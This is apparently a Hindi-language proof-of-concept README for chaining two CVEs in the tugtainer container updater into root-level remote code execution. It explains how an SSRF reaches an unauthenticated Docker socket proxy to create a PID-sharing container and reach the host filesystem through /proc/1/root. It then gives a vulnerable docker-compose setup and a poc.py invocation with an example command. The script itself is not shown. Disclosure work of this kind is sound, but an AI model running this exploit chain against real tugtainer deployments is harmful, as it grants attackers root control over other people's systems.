
CVE-2026-55494 और CVE-2026-62308 का संयोजन tugtainer में रूट विशेषाधिकार RCE प्राप्त करने के लिए
RCE दो कमजोरियों का दुरुपयोग करके प्राप्त किया जाता है
संक्षेप में, एक SSRF कमजोरी का दुरुपयोग करके आंतरिक नेटवर्क में एक अप्रमाणित सेवा को कॉल किया जाता है ताकि एक डॉकर बनाया जा सके जो tugtainer के साथ समान pid साझा करता है, इस प्रकार /proc/1/root के माध्यम से tugtainer डॉकर का फाइल सिस्टम सुलभ हो जाता है, और चूंकि बनाए गए डॉकर के पास रूट स्तर का विशेषाधिकार है, तकनीकी रूप से आपके पास tugtainer डॉकर सिस्टम पर रूट स्तर का नियंत्रण होता है।
docker-compose.yml के साथ docker compose चलाएं, या निम्नलिखित को कॉपी और पेस्ट करेंnetworks:
tugtainer:
driver: bridge
services:
socket-proxy:
image: lscr.io/linuxserver/socket-proxy:latest
container_name: socket-proxy
environment:
CONTAINERS: 1
EVENTS: 1
IMAGES: 1
INFO: 1
LOG_LEVEL: warning
PING: 1
NETWORKS: 1
POST: 1
TZ: Europe/Moscow
VERSION: 1
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
restart: unless-stopped
read_only: true
tmpfs:
- /run
networks:
- tugtainer
labels:
dev.quenary.tugtainer.protected: True
app:
depends_on:
- socket-proxy
container_name: tugtainer
image: ghcr.io/quenary/tugtainer:1.30.2
tmpfs:
- /tugtainer:size=100m
restart: unless-stopped
environment:
DOCKER_HOST: tcp://socket-proxy:2375
networks:
- tugtainer
ports:
- '9412:80'
labels:
dev.quenary.tugtainer.protected: True
poc.py को निम्नानुसार चलाएं$ python poc.py <URL> <PASSWORD> <COMMAND>
$ python poc.py http://localhost:9412 Admin123! "whoami > /proc/1/root/tmp/pwned"
/tmp में pwned नामक फ़ाइल बनानी चाहिए